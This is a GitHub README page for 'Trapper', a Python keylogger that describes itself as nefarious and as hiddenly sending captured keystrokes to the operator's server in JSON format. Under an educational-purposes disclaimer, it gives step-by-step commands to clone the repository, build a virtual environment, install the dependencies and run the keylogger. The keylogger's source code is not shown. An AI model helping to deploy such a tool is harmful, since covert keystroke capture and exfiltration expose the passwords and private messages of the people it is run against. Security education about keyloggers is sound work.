Skip to content

Latest commit

 

History

History
23 lines (21 loc) · 983 Bytes

README.md

File metadata and controls

23 lines (21 loc) · 983 Bytes

Trapper

A simple but nefarious Python Keylogger with minimal dependencies (pynput & requests) that will hiddenously sending data to your server in JSON Format

This code DOES NOT promote or encourage any illegal activities! The content in this document is provided solely for educational purposes and to create awareness!

Installation (with git and python dependency)

Open Terminal and Write: git clone https://github.com/davidbombal/python-keylogger.git

Type in the terminal. cd python-keylogger

Upgrade your virtual environment on Windows Machine pip install --upgrade virtualenv

Create Virtual Environment in Windows. Using command python -m venv keylogger_env

Activating the Virtual Environment keylogger_env\Scripts\activate

Run the command to install all the packages required in your virtual environment. pip install -r requirements.txt

For running the program , Run command python Tapper.py